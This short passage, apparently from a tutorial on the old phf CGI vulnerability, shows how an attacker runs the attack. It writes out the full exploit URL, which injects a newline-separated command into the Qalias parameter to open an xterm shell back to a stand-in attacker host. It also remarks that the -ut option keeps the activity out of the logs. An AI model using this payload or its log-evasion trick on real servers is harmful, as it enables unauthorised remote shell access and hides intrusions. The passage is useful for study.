Executing the attack
Now, the attacker needs to execute the command '/usr/X11R6/bin/xterm -ut -display evil.attacker's.i.p:0.0' by requesting for the following URL:
http://target's.i.p.address/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20evil.attacker's.i.p:0.0
After the exploit has been executed successfully the remote web server will simply execute the xterm with -display and -ut option enabled and display it back to the attacker's X server with the window id of 0 and screen id of 0. The activity will not be logged by the system as -ut option was enabled. Voila! The attacker has now gained interactive shell access and total control over the system. |